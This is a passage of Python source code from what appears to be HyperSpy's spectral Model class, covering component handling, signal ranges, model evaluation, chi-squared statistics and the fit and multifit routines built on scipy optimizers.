Fetch stored values of the parameters.
update_plot
Force a plot update. (In most cases the plot should update
automatically.)
set_signal_range, remove_signal range, reset_signal_range,
add signal_range.
Customize the signal range to fit.
fit, multifit
Fit the model to the data at the current position or the
full dataset.
save_parameters2file, load_parameters_from_file
Save/load the parameter values to/from a file.
plot
Plot the model and the data.
enable_plot_components, disable_plot_components
Plot each component separately. (Use after `plot`.)
set_current_values_to
Set the current value of all the parameters of the given component as
the value for all the dataset.
export_results
Save the value of the parameters in separate files.
plot_results
Plot the value of all parameters at all positions.
print_current_values
Print the value of the parameters at the current position.
enable_adjust_position, disable_adjust_position
Enable/disable interactive adjustment of the position of the components
that have a well defined position. (Use after `plot`).
fit_component
Fit just the given component in the given signal range, that can be
set interactively.
set_parameters_not_free, set_parameters_free
Fit the `free` status of several components and parameters at once.
set_parameters_value
Set the value of a parameter in components in a model to a specified
value.
Examples
--------
In the following example we create a histogram from a normal distribution
and fit it with a gaussian component. It demonstrates how to create
a model from a :class:`~._signals.spectrum.Spectrum` instance, add
components to it, adjust the value of the parameters of the components,
fit the model to the data and access the components in the model.
>>> s = signals.Spectrum(
np.random.normal(scale=2, size=10000)).get_histogram()
>>> g = components.Gaussian()
>>> m = s.create_model()
>>> m.append(g)
>>> m.print_current_values()
Components Parameter Value
Gaussian
sigma 1.000000
A 1.000000
centre 0.000000
>>> g.centre.value = 3
>>> m.print_current_values()
Components Parameter Value
Gaussian
sigma 1.000000
A 1.000000
centre 3.000000
>>> g.sigma.value
1.0
>>> m.fit()
>>> g.sigma.value
1.9779042300856682
>>> m[0].sigma.value
1.9779042300856682
>>> m["Gaussian"].centre.value
-0.072121936813224569
"""
_firstimetouch = True
def __hash__(self):
# This is needed to simulate a hashable object so that PySide does not
# raise an exception when using windows.connect
return id(self)
def __init__(self, spectrum):
self.convolved = False
self.spectrum = spectrum
self.axes_manager = self.spectrum.axes_manager
self.axis = self.axes_manager.signal_axes[0]
self.axes_manager.connect(self.fetch_stored_values)
self.free_parameters_boundaries = None
self.channel_switches = np.array([True] * len(self.axis.axis))
self._low_loss = None
self._position_widgets = []
self._plot = None
self._model_line = None
self.chisq = spectrum._get_navigation_signal()
self.chisq.change_dtype("float")
self.chisq.data.fill(np.nan)
self.chisq.metadata.General.title = \
self.spectrum.metadata.General.title + ' chi-squared'
self.dof = self.chisq._deepcopy_with_new_data(
np.zeros_like(
self.chisq.data,
dtype='int'))
self.dof.metadata.General.title = \
self.spectrum.metadata.General.title + ' degrees of freedom'
self._suspend_update = False
self._adjust_position_all = None
self._plot_components = False
def __repr__(self):
return u"<Model %s>".encode('utf8') % super(Model, self).__repr__()
def _get_component(self, object):
if isinstance(object, int) or isinstance(object, basestring):
object = self[object]
elif not isinstance(object, Component):
raise ValueError("Not a component or component id.")
if object in self:
return object
else:
raise ValueError("The component is not in the model.")
def insert(self):
raise NotImplementedError
@property
def spectrum(self):
return self._spectrum
@spectrum.setter
def spectrum(self, value):
if isinstance(value, Spectrum):
self._spectrum = value
else:
raise WrongObjectError(str(type(value)), 'Spectrum')
@property
def low_loss(self):
return self._low_loss
@low_loss.setter
def low_loss(self, value):
if value is not None:
if (value.axes_manager.navigation_shape !=
self.spectrum.axes_manager.navigation_shape):
raise ValueError('The low-loss does not have '
'the same navigation dimension as the '
'core-loss')
self._low_loss = value
self.set_convolution_axis()
self.convolved = True
else:
self._low_loss = value
self.convolution_axis = None
self.convolved = False
# Extend the list methods to call the _touch when the model is modified
def append(self, object):
# Check if any of the other components in the model has the same name
if object in self:
raise ValueError("Component already in model")
component_name_list = []
for component in self:
component_name_list.append(component.name)
name_string = ""
if object.name:
name_string = object.name
else:
name_string = object._id_name
if name_string in component_name_list:
temp_name_string = name_string
index = 0
while temp_name_string in component_name_list:
temp_name_string = name_string + "_" + str(index)
index += 1
name_string = temp_name_string
object.name = name_string
object._axes_manager = self.axes_manager
object._create_arrays()
list.append(self, object)
object.model = self
self._touch()
if self._plot_components:
self._plot_component(object)
if self._adjust_position_all is not None:
self._make_position_adjuster(object, self._adjust_position_all[0],
self._adjust_position_all[1])
def extend(self, iterable):
for object in iterable:
self.append(object)
def __delitem__(self, object):
list.__delitem__(self, object)
object.model = None
self._touch()
def remove(self, object, touch=True):
"""Remove component from model.
Examples
--------
>>> s = signals.Spectrum(np.empty(1))
>>> m = s.create_model()
>>> g = components.Gaussian()
>>> m.append(g)
You could remove `g` like this
>>> m.remove(g)
Like this:
>>> m.remove("Gaussian")
Or like this:
>>> m.remove(0)
"""
object = self._get_component(object)
for pw in self._position_widgets:
if hasattr(pw, 'component') and pw.component is object:
pw.component._position.twin = None
del pw.component
pw.close()
del pw
if hasattr(object, '_model_plot_line'):
line = object._model_plot_line
line.close()
del line
idx = self.index(object)
self.spectrum._plot.signal_plot.ax_lines.remove(
self.spectrum._plot.signal_plot.ax_lines[2 + idx])
list.remove(self, object)
object.model = None
if touch is True:
self._touch()
if self._plot_active:
self.update_plot()
def _touch(self):
"""Run model setup tasks
This function is called everytime that we add or remove components
from the model.
"""
if self._plot_active is True:
self._connect_parameters2update_plot()
__touch = _touch
def set_convolution_axis(self):
"""
Creates an axis to use to generate the data of the model in the precise
scale to obtain the correct axis and origin after convolution with the
lowloss spectrum.
"""
ll_axis = self.low_loss.axes_manager.signal_axes[0]
dimension = self.axis.size + ll_axis.size - 1
step = self.axis.scale
knot_position = ll_axis.size - ll_axis.value2index(0) - 1
self.convolution_axis = generate_axis(self.axis.offset, step,
dimension, knot_position)
def _connect_parameters2update_plot(self):
if self._plot_active is False:
return
for i, component in enumerate(self):
component.connect(
self._model_line.update)
for parameter in component.parameters:
parameter.connect(self._model_line.update)
if self._plot_components is True:
self._connect_component_lines()
def _disconnect_parameters2update_plot(self):
if self._model_line is None:
return
for component in self:
component.disconnect(self._model_line.update)
for parameter in component.parameters:
parameter.disconnect(self._model_line.update)
if self._plot_components is True:
self._disconnect_component_lines()
def as_signal(self, component_list=None, out_of_range_to_nan=True,
show_progressbar=None):
"""Returns a recreation of the dataset using the model.
        By default, the spectral range that is not fitted is filled with nans.
Parameters
----------
component_list : list of hyperspy components, optional
If a list of components is given, only the components given in the
list is used in making the returned spectrum. The components can
be specified by name, index or themselves.
out_of_range_to_nan : bool
If True the spectral range that is not fitted is filled with nans.
show_progressbar : None or bool
If True, display a progress bar. If None the default is set in
`preferences`.
Returns
-------
spectrum : An instance of the same class as `spectrum`.
Examples
--------
>>> s = signals.Spectrum(np.random.random((10,100)))
>>> m = s.create_model()
>>> l1 = components.Lorentzian()
>>> l2 = components.Lorentzian()
>>> m.append(l1)
>>> m.append(l2)
>>> s1 = m.as_signal()
>>> s2 = m.as_signal(component_list=[l1])
"""
        # sentinel values (anything that is not a bool) used to tag
        # multidimensional active state
_multi_on_ = '_multi_on_'
_multi_off_ = '_multi_off_'
if show_progressbar is None:
show_progressbar = preferences.General.show_progressbar
if component_list:
component_list = [self._get_component(x) for x in component_list]
active_state = []
for component_ in self:
if component_.active_is_multidimensional:
if component_ not in component_list:
active_state.append(_multi_off_)
component_._toggle_connect_active_array(False)
component_.active = False
else:
active_state.append(_multi_on_)
else:
active_state.append(component_.active)
if component_ in component_list:
component_.active = True
else:
component_.active = False
data = np.empty(self.spectrum.data.shape, dtype='float')
data.fill(np.nan)
if out_of_range_to_nan is True:
channel_switches_backup = copy.copy(self.channel_switches)
self.channel_switches[:] = True
maxval = self.axes_manager.navigation_size
pbar = progressbar.progressbar(maxval=maxval,
disabled=not show_progressbar)
i = 0
for index in self.axes_manager:
self.fetch_stored_values(only_fixed=False)
data[self.axes_manager._getitem_tuple][
self.channel_switches] = self.__call__(
non_convolved=not self.convolved, onlyactive=True)
i += 1
if maxval > 0:
pbar.update(i)
pbar.finish()
if out_of_range_to_nan is True:
self.channel_switches[:] = channel_switches_backup
spectrum = self.spectrum.__class__(
data,
axes=self.spectrum.axes_manager._get_axes_dicts())
spectrum.metadata.General.title = (
self.spectrum.metadata.General.title + " from fitted model")
spectrum.metadata.Signal.binned = self.spectrum.metadata.Signal.binned
if component_list:
for component_ in self:
active_s = active_state.pop(0)
if isinstance(active_s, bool):
component_.active = active_s
else:
if active_s == _multi_off_:
component_._toggle_connect_active_array(True)
return spectrum
@property
def _plot_active(self):
if self._plot is not None and self._plot.is_active() is True:
return True
else:
return False
def _set_p0(self):
self.p0 = ()
for component in self:
if component.active:
for parameter in component.free_parameters:
self.p0 = (self.p0 + (parameter.value,)
if parameter._number_of_elements == 1
else self.p0 + parameter.value)
def set_boundaries(self):
"""Generate the boundary list.
Necessary before fitting with a boundary aware optimizer.
"""
self.free_parameters_boundaries = []
for component in self:
if component.active:
for param in component.free_parameters:
if param._number_of_elements == 1:
self.free_parameters_boundaries.append((
param._bounds))
else:
self.free_parameters_boundaries.extend((
param._bounds))
def set_mpfit_parameters_info(self):
self.mpfit_parinfo = []
for component in self:
if component.active:
for param in component.free_parameters:
limited = [False, False]
limits = [0, 0]
if param.bmin is not None:
limited[0] = True
limits[0] = param.bmin
if param.bmax is not None:
limited[1] = True
limits[1] = param.bmax
if param._number_of_elements == 1:
self.mpfit_parinfo.append(
{'limited': limited,
'limits': limits})
else:
self.mpfit_parinfo.extend((
{'limited': limited,
'limits': limits},) * param._number_of_elements)
def store_current_values(self):
""" Store the parameters of the current coordinates into the
parameters array.
        If the parameters array has not been defined yet, it is created and
        filled with the current parameters."""
for component in self:
if component.active:
component.store_current_parameters_in_map()
def fetch_stored_values(self, only_fixed=False):
"""Fetch the value of the parameters that has been previously stored.
Parameters
----------
only_fixed : bool
If True, only the fixed parameters are fetched.
See Also
--------
store_current_values
"""
switch_aap = self._plot_active is not False
if switch_aap is True:
self._disconnect_parameters2update_plot()
for component in self:
component.fetch_stored_values(only_fixed=only_fixed)
if switch_aap is True:
self._connect_parameters2update_plot()
self.update_plot()
def update_plot(self, *args, **kwargs):
"""Update model plot.
The updating can be suspended using `suspend_update`.
See Also
--------
suspend_update
resume_update
"""
if self._plot_active is True and self._suspend_update is False:
try:
self._update_model_line()
for component in [component for component in self if
component.active is True]:
self._update_component_line(component)
except:
self._disconnect_parameters2update_plot()
def suspend_update(self):
"""Prevents plot from updating until resume_update() is called
See Also
--------
resume_update
update_plot
"""
if self._suspend_update is False:
self._suspend_update = True
self._disconnect_parameters2update_plot()
else:
warnings.warn("Update already suspended, does nothing.")
def resume_update(self, update=True):
"""Resumes plot update after suspension by suspend_update()
Parameters
----------
update : bool, optional
If True, also updates plot after resuming (default).
See Also
--------
suspend_update
update_plot
"""
if self._suspend_update is True:
self._suspend_update = False
self._connect_parameters2update_plot()
if update is True:
                # Ideally, the update flag should instead work like this:
# If update is true, update_plot is called if any action
# would have called it while updating was suspended.
# However, this is prohibitively difficult to track, so
                # instead it is simply assumed that a change has happened
# between suspend and resume, and therefore that the plot
# needs to update. As we do not know what has changed,
# all components need to update. This can however be
# suppressed by setting update to false
self.update_plot()
else:
warnings.warn("Update not suspended, nothing to resume.")
def _update_model_line(self):
if (self._plot_active is True and
self._model_line is not None):
self._model_line.update()
def _fetch_values_from_p0(self, p_std=None):
"""Fetch the parameter values from the output of the optimzer `self.p0`
Parameters
----------
p_std : array
            array containing the corresponding standard deviation
"""
comp_p_std = None
counter = 0
for component in self: # Cut the parameters list
if component.active is True:
if p_std is not None:
comp_p_std = p_std[
counter: counter +
component._nfree_param]
component.fetch_values_from_array(
self.p0[counter: counter + component._nfree_param],
comp_p_std, onlyfree=True)
counter += component._nfree_param
# Defines the functions for the fitting process -------------------------
def _model2plot(self, axes_manager, out_of_range2nans=True):
old_axes_manager = None
if axes_manager is not self.axes_manager:
old_axes_manager = self.axes_manager
self.axes_manager = axes_manager
self.fetch_stored_values()
s = self.__call__(non_convolved=False, onlyactive=True)
if old_axes_manager is not None:
self.axes_manager = old_axes_manager
self.fetch_stored_values()
if out_of_range2nans is True:
ns = np.empty((self.axis.axis.shape))
ns.fill(np.nan)
ns[self.channel_switches] = s
s = ns
return s
def __call__(self, non_convolved=False, onlyactive=False):
"""Returns the corresponding model for the current coordinates
Parameters
----------
non_convolved : bool
If True it will return the deconvolved model
only_active : bool
If True, only the active components will be used to build the
model.
cursor: 1 or 2
Returns
-------
numpy array
"""
if self.convolved is False or non_convolved is True:
axis = self.axis.axis[self.channel_switches]
sum_ = np.zeros(len(axis))
if onlyactive is True:
for component in self: # Cut the parameters list
if component.active:
np.add(sum_, component.function(axis),
sum_)
else:
for component in self: # Cut the parameters list
np.add(sum_, component.function(axis),
sum_)
to_return = sum_
else: # convolved
counter = 0
sum_convolved = np.zeros(len(self.convolution_axis))
sum_ = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if onlyactive:
if component.active:
if component.convolved:
np.add(sum_convolved,
component.function(
self.convolution_axis), sum_convolved)
else:
np.add(sum_,
component.function(self.axis.axis), sum_)
counter += component._nfree_param
else:
if component.convolved:
np.add(sum_convolved,
component.function(self.convolution_axis),
sum_convolved)
else:
np.add(sum_, component.function(self.axis.axis),
sum_)
counter += component._nfree_param
to_return = sum_ + np.convolve(
self.low_loss(self.axes_manager),
sum_convolved, mode="valid")
to_return = to_return[self.channel_switches]
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
# TODO: the way it uses the axes
def _set_signal_range_in_pixels(self, i1=None, i2=None):
"""Use only the selected spectral range in the fitting routine.
Parameters
----------
i1 : Int
i2 : Int
Notes
-----
To use the full energy range call the function without arguments.
"""
self.backup_channel_switches = copy.copy(self.channel_switches)
self.channel_switches[:] = False
self.channel_switches[i1:i2] = True
self.update_plot()
@interactive_range_selector
def set_signal_range(self, x1=None, x2=None):
"""Use only the selected spectral range defined in its own units in the
fitting routine.
Parameters
----------
        x1 : None or float
        x2 : None or float
Notes
-----
To use the full energy range call the function without arguments.
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._set_signal_range_in_pixels(i1, i2)
def _remove_signal_range_in_pixels(self, i1=None, i2=None):
"""Removes the data in the given range from the data range that
        will be used by the fitting routine
Parameters
----------
x1 : None or float
x2 : None or float
"""
self.channel_switches[i1:i2] = False
self.update_plot()
@interactive_range_selector
def remove_signal_range(self, x1=None, x2=None):
"""Removes the data in the given range from the data range that
        will be used by the fitting routine
Parameters
----------
x1 : None or float
x2 : None or float
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._remove_signal_range_in_pixels(i1, i2)
def reset_signal_range(self):
'''Resets the data range'''
self._set_signal_range_in_pixels()
def _add_signal_range_in_pixels(self, i1=None, i2=None):
"""Adds the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
self.channel_switches[i1:i2] = True
self.update_plot()
@interactive_range_selector
def add_signal_range(self, x1=None, x2=None):
"""Adds the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._add_signal_range_in_pixels(i1, i2)
def reset_the_signal_range(self):
self.channel_switches[:] = True
self.update_plot()
def _model_function(self, param):
if self.convolved is True:
counter = 0
sum_convolved = np.zeros(len(self.convolution_axis))
sum = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if component.active:
if component.convolved is True:
np.add(sum_convolved, component.__tempcall__(param[
counter:counter + component._nfree_param],
self.convolution_axis), sum_convolved)
else:
np.add(
sum,
component.__tempcall__(
param[
counter:counter +
component._nfree_param],
self.axis.axis),
sum)
counter += component._nfree_param
to_return = (sum + np.convolve(self.low_loss(self.axes_manager),
sum_convolved, mode="valid"))[
self.channel_switches]
else:
axis = self.axis.axis[self.channel_switches]
counter = 0
first = True
for component in self: # Cut the parameters list
if component.active:
if first is True:
sum = component.__tempcall__(
param[
counter:counter +
component._nfree_param],
axis)
first = False
else:
sum += component.__tempcall__(
param[
counter:counter +
component._nfree_param],
axis)
counter += component._nfree_param
to_return = sum
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
def _jacobian(self, param, y, weights=None):
if self.convolved is True:
counter = 0
grad = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if component.active:
component.fetch_values_from_array(
param[
counter:counter +
component._nfree_param],
onlyfree=True)
if component.convolved:
for parameter in component.free_parameters:
par_grad = np.convolve(
parameter.grad(self.convolution_axis),
self.low_loss(self.axes_manager),
mode="valid")
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, np.convolve(
parameter.grad(
self.convolution_axis),
self.low_loss(self.axes_manager),
mode="valid"), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
else:
for parameter in component.free_parameters:
par_grad = parameter.grad(self.axis.axis)
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, parameter.grad(
self.axis.axis), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
if weights is None:
to_return = grad[1:, self.channel_switches]
else:
to_return = grad[1:, self.channel_switches] * weights
else:
axis = self.axis.axis[self.channel_switches]
counter = 0
grad = axis
for component in self: # Cut the parameters list
if component.active:
component.fetch_values_from_array(
param[
counter:counter +
component._nfree_param],
onlyfree=True)
for parameter in component.free_parameters:
par_grad = parameter.grad(axis)
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, parameter.grad(
axis), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
if weights is None:
to_return = grad[1:, :]
else:
to_return = grad[1:, :] * weights
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
def _function4odr(self, param, x):
return self._model_function(param)
def _jacobian4odr(self, param, x):
return self._jacobian(param, x)
def _poisson_likelihood_function(self, param, y, weights=None):
"""Returns the likelihood function of the model for the given
data and parameters
"""
mf = self._model_function(param)
with np.errstate(invalid='ignore'):
return -(y * np.log(mf) - mf).sum()
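    # Note: the expression above is the negative Poisson log-likelihood of the
    # model, i.e. -sum_i(y_i * log(m_i) - m_i), dropping the constant
    # sum_i log(y_i!) term that does not depend on the parameters.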
def _gradient_ml(self, param, y, weights=None):
mf = self._model_function(param)
return -(self._jacobian(param, y) * (y / mf - 1)).sum(1)
def _errfunc(self, param, y, weights=None):
errfunc = self._model_function(param) - y
if weights is None:
return errfunc
else:
return errfunc * weights
def _errfunc2(self, param, y, weights=None):
if weights is None:
return ((self._errfunc(param, y)) ** 2).sum()
else:
return ((weights * self._errfunc(param, y)) ** 2).sum()
def _gradient_ls(self, param, y, weights=None):
gls = (2 * self._errfunc(param, y, weights) *
self._jacobian(param, y)).sum(1)
return gls
def _errfunc4mpfit(self, p, fjac=None, x=None, y=None,
weights=None):
if fjac is None:
errfunc = self._model_function(p) - y
if weights is not None:
errfunc *= weights
status = 0
return [status, errfunc]
else:
return [0, self._jacobian(p, y).T]
def _calculate_chisq(self):
if self.spectrum.metadata.has_item('Signal.Noise_properties.variance'):
variance = self.spectrum.metadata.Signal.Noise_properties.variance
if isinstance(variance, Signal):
variance = variance.data.__getitem__(
self.spectrum.axes_manager._getitem_tuple
)[self.channel_switches]
else:
variance = 1.0
d = self(onlyactive=True) - self.spectrum()[self.channel_switches]
d *= d / (1. * variance) # d = difference^2 / variance.
self.chisq.data[self.spectrum.axes_manager.indices[::-1]] = sum(d)
def _set_current_degrees_of_freedom(self):
self.dof.data[self.spectrum.axes_manager.indices[::-1]] = len(self.p0)
@property
def red_chisq(self):
"""Reduced chi-squared. Calculated from self.chisq and self.dof
"""
tmp = self.chisq / (- self.dof + sum(self.channel_switches) - 1)
tmp.metadata.General.title = self.spectrum.metadata.General.title + \
' reduced chi-squared'
return tmp
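    # Equivalently, red_chisq = chisq / (N - p - 1), where N is the number of
    # channels included in the fit (sum of channel_switches) and p is the number
    # of free parameters stored in `dof`.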
def fit(self, fitter=None, method='ls', grad=False,
bounded=False, ext_bounding=False, update_plot=False,
**kwargs):
"""Fits the model to the experimental data.
The chi-squared, reduced chi-squared and the degrees of freedom are
computed automatically when fitting. They are stored as signals, in the
`chisq`, `red_chisq` and `dof`. Note that,
unless ``metadata.Signal.Noise_properties.variance`` contains an
accurate estimation of the variance of the data, the chi-squared and
reduced chi-squared cannot be computed correctly. This is also true for
        homoscedastic noise.
Parameters
----------
fitter : {None, "leastsq", "odr", "mpfit", "fmin"}
The optimizer to perform the fitting. If None the fitter
defined in `preferences.Model.default_fitter` is used.
"leastsq" performs least squares using the Levenberg–Marquardt
algorithm.
"mpfit" performs least squares using the Levenberg–Marquardt
algorithm and, unlike "leastsq", support bounded optimization.
"fmin" performs curve fitting using a downhill simplex algorithm.
It is less robust than the Levenberg-Marquardt based optimizers,
            but, at present, it is the only one that supports maximum likelihood
optimization for poissonian noise.
"odr" performs the optimization using the orthogonal distance
regression algorithm. It does not support bounds.
"leastsq", "odr" and "mpfit" can estimate the standard deviation of
the estimated value of the parameters if the
"metada.Signal.Noise_properties.variance" attribute is defined.
Note that if it is not defined the standard deviation is estimated
            using a variance equal to 1, which, if the noise is heteroscedastic,
            will result in a biased estimation of the parameter values and errors.
If `variance` is a `Signal` instance of the
same `navigation_dimension` as the spectrum, and `method` is "ls"
weighted least squares is performed.
method : {'ls', 'ml'}
Choose 'ls' (default) for least squares and 'ml' for poissonian
maximum-likelihood estimation. The latter is only available when
`fitter` is "fmin".
grad : bool
If True, the analytical gradient is used if defined to
speed up the optimization.
bounded : bool
If True performs bounded optimization if the fitter
            supports it. Currently "mpfit", "tnc" and "l_bfgs_b" support it.
update_plot : bool
If True, the plot is updated during the optimization
            process. It slows down the optimization but it allows the
            optimization progress to be visualized.
ext_bounding : bool
If True, enforce bounding by keeping the value of the
parameters constant out of the defined bounding area.
**kwargs : key word arguments
Any extra key word argument will be passed to the chosen
fitter. For more information read the docstring of the optimizer
of your choice in `scipy.optimize`.
See Also
--------
multifit
"""
if fitter is None:
fitter = preferences.Model.default_fitter
switch_aap = (update_plot != self._plot_active)
if switch_aap is True and update_plot is False:
self._disconnect_parameters2update_plot()
self.p_std = None
self._set_p0()
if ext_bounding:
self._enable_ext_bounding()
if grad is False:
approx_grad = True
jacobian = None
odr_jacobian = None
grad_ml = None
grad_ls = None
else:
approx_grad = False
jacobian = self._jacobian
odr_jacobian = self._jacobian4odr
grad_ml = self._gradient_ml
grad_ls = self._gradient_ls
if bounded is True and fitter not in ("mpfit", "tnc", "l_bfgs_b"):
raise NotImplementedError("Bounded optimization is only available "
"for the mpfit optimizer.")
if method == 'ml':
weights = None
if fitter != "fmin":
raise NotImplementedError("Maximum likelihood estimation "
'is only implemented for the "fmin" '
'optimizer')
elif method == "ls":
if ("Signal.Noise_properties.variance" not in
self.spectrum.metadata):
variance = 1
else:
variance = self.spectrum.metadata.Signal.\
Noise_properties.variance
if isinstance(variance, Signal):
if (variance.axes_manager.navigation_shape ==
self.spectrum.axes_manager.navigation_shape):
variance = variance.data.__getitem__(
self.axes_manager._getitem_tuple)[
self.channel_switches]
else:
raise AttributeError(
"The `navigation_shape` of the variance signals "
"is not equal to the variance shape of the "
"spectrum")
elif not isinstance(variance, numbers.Number):
raise AttributeError(
"Variance must be a number or a `Signal` instance but "
"currently it is a %s" % type(variance))
weights = 1. / np.sqrt(variance)
else:
raise ValueError(
'method must be "ls" or "ml" but %s given' %
method)
args = (self.spectrum()[self.channel_switches],
weights)
# Least squares "dedicated" fitters
if fitter == "leastsq":
output = \
leastsq(self._errfunc, self.p0[:], Dfun=jacobian,
col_deriv=1, args=args, full_output=True, **kwargs)
self.p0, pcov = output[0:2]
if (self.axis.size > len(self.p0)) and pcov is not None:
pcov *= ((self._errfunc(self.p0, *args) ** 2).sum() /
(len(args[0]) - len(self.p0)))
self.p_std = np.sqrt(np.diag(pcov))
self.fit_output = output
elif fitter == "odr":
modelo = odr.Model(fcn=self._function4odr,
fjacb=odr_jacobian)
mydata = odr.RealData(
self.axis.axis[
self.channel_switches], self.spectrum()[
self.channel_switches], sx=None, sy=(
1 / weights if weights is not None else None))
myodr = odr.ODR(mydata, modelo, beta0=self.p0[:])
myoutput = myodr.run()
result = myoutput.beta
self.p_std = myoutput.sd_beta
self.p0 = result
self.fit_output = myoutput
elif fitter == 'mpfit':
autoderivative = 1
if grad is True:
autoderivative = 0
if bounded is True:
self.set_mpfit_parameters_info()
elif bounded is False:
self.mpfit_parinfo = None
m = mpfit(self._errfunc4mpfit, self.p0[:],
parinfo=self.mpfit_parinfo, functkw={
'y': self.spectrum()[self.channel_switches],
'weights': weights}, autoderivative=autoderivative,
quiet=1)
self.p0 = m.params
if (self.axis.size > len(self.p0)) and m.perror is not None:
self.p_std = m.perror * np.sqrt(
(self._errfunc(self.p0, *args) ** 2).sum() /
(len(args[0]) - len(self.p0)))
self.fit_output = m
else:
            # General optimizers (including constrained ones: tnc, l_bfgs_b)
# Least squares or maximum likelihood
if method == 'ml':
tominimize = self._poisson_likelihood_function
fprime = grad_ml
elif method in ['ls', "wls"]:
tominimize = self._errfunc2
fprime = grad_ls
# OPTIMIZERS
# Simple (don't use gradient)
if fitter == "fmin":
self.p0 = fmin(
tominimize, self.p0, args=args, **kwargs)
elif fitter == "powell":
self.p0 = fmin_powell(tominimize, self.p0, args=args,
**kwargs)
# Make use of the gradient
elif fitter == "cg":
self.p0 = fmin_cg(tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
elif fitter == "ncg":
self.p0 = fmin_ncg(tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
elif fitter == "bfgs":
self.p0 = fmin_bfgs(
tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
            # Constrained optimizers
# Use gradient
elif fitter == "tnc":
if bounded is True:
self.set_boundaries()
elif bounded is False:
                    self.free_parameters_boundaries = None
self.p0 = fmin_tnc(
tominimize,
self.p0,
fprime=fprime,
args=args,
bounds=self.free_parameters_boundaries,
approx_grad=approx_grad,
**kwargs)[0]
elif fitter == "l_bfgs_b":
if bounded is True:
self.set_boundaries()
elif bounded is False:
                    self.free_parameters_boundaries = None
self.p0 = fmin_l_bfgs_b(tominimize, self.p0,
fprime=fprime, args=args,
bounds=self.free_parameters_boundaries,
approx_grad=approx_grad, **kwargs)[0]
else:
print \
"""
The %s optimizer is not available.
Available optimizers:
Unconstrained:
--------------
Only least Squares: leastsq and odr
General: fmin, powell, cg, ncg, bfgs
                Constrained:
------------
tnc and l_bfgs_b
""" % fitter
if np.iterable(self.p0) == 0:
self.p0 = (self.p0,)
self._fetch_values_from_p0(p_std=self.p_std)
self.store_current_values()
self._calculate_chisq()
self._set_current_degrees_of_freedom()
if ext_bounding is True:
self._disable_ext_bounding()
if switch_aap is True and update_plot is False:
self._connect_parameters2update_plot()
self.update_plot()
def multifit(self, mask=None, fetch_only_fixed=False,
autosave=False, autosave_every=10, show_progressbar=None,
**kwargs):
"""Fit the data to the model at all the positions of the
navigation dimensions.
Parameters
----------
mask : {None, numpy.array}
To mask (do not fit) at certain position pass a numpy.array
of type bool where True indicates that the data will not be
fitted at the given position.
fetch_only_fixed : bool
            If True, only the fixed parameter values will be updated
            when changing the position.
autosave : bool
If True, the result of the fit will be saved automatically
with a frequency defined by autosave_every.
autosave_every : int
Save the result of fitting every given number of spectra.
show_progressbar : None or bool
If True, display a progress bar. If None the default is set in
`preferences`.
**kwargs : key word arguments
Any extra key word argument will be passed to
the fit method. See the fit method documentation for
a list of valid arguments.
See Also
--------
fit
"""
if show_progressbar is None:
show_progressbar = preferences.General.show_progressbar
if autosave is not False:
fd, autosave_fn = tempfile.mkstemp(
prefix='hyperspy_autosave-',
dir='.', suffix='.npz')
os.close(fd)
autosave_fn = autosave_fn[:-4]
messages.information(
"Autosaving each %s pixels to %s.npz" % (autosave_every,
autosave_fn))
messages.information(
"When multifit finishes its job the file will be deleted")
if mask is not None and (
mask.shape != tuple(
self.axes_manager._navigation_shape_in_array)):
messages.warning_exit(
"The mask must be a numpy array of boolen type with "
" shape: %s" +
str(self.axes_manager._navigation_shape_in_array))
masked_elements = 0 if mask is None else mask.sum()
maxval = self.axes_manager.navigation_size - masked_elements
if maxval > 0:
pbar = progressbar.progressbar(maxval=maxval,
disabled=not show_progressbar)
if 'bounded' in kwargs and kwargs['bounded'] is True:
if kwargs['fitter'] == 'mpfit':
self.set_mpfit_parameters_info()
kwargs['bounded'] = None
elif kwargs['fitter'] in ("tnc", "l_bfgs_b"):
self.set_boundaries()
kwargs['bounded'] = None
else:
messages.information(
"The chosen fitter does not suppport bounding."
"If you require bounding please select one of the "
"following fitters instead: mpfit, tnc, l_bfgs_b")
kwargs['bounded'] = False
i = 0
self.axes_manager.disconnect(self.fetch_stored_values)
for index in self.axes_manager:
if mask is None or not mask[index[::-1]]:
self.fetch_stored_values(only_fixed=fetch_only_fixed)
self.fit(**kwargs)
i += 1
if maxval > 0:
pbar.update(i)
if autosave is True and i % autosave_every == 0:
self.save_parameters2file(autosave_fn)
if maxval > 0:
pbar.finish()
self.axes_manager.connect(self.fetch_stored_values)
if autosave is True:
messages.information(
                'Deleting the temporary file %s' % (
                    autosave_fn + '.npz'))
os.remove(autosave_fn + '.npz')
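    # Minimal usage sketch (assumes `m` is a Model with components already
    # appended):
    #   m.multifit(fitter="leastsq", show_progressbar=False)
    #   m.red_chisq.plot()  # inspect the fit quality over the navigation axes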
def save_parameters2file(self, filename):
"""Save the parameters array in binary format.
The data is saved to a single file in numpy's uncompressed ``.npz``
format.
Parameters
----------
filename : str
See Also
--------
load_parameters_from_file, export_results
Notes
-----
This method can be used to save the current state of the model in a way
        that can be loaded back to recreate it using `load_parameters_from_file`.
        Actually, as of HyperSpy 0.8 this is the only way to do so.
However, this is known to be brittle. For example see
https://github.com/hyperspy/hyperspy/issues/341.
"""
kwds = {}
i = 0
for component in self:
cname = component.name.lower().replace(' ', '_')
for param in component.parameters:
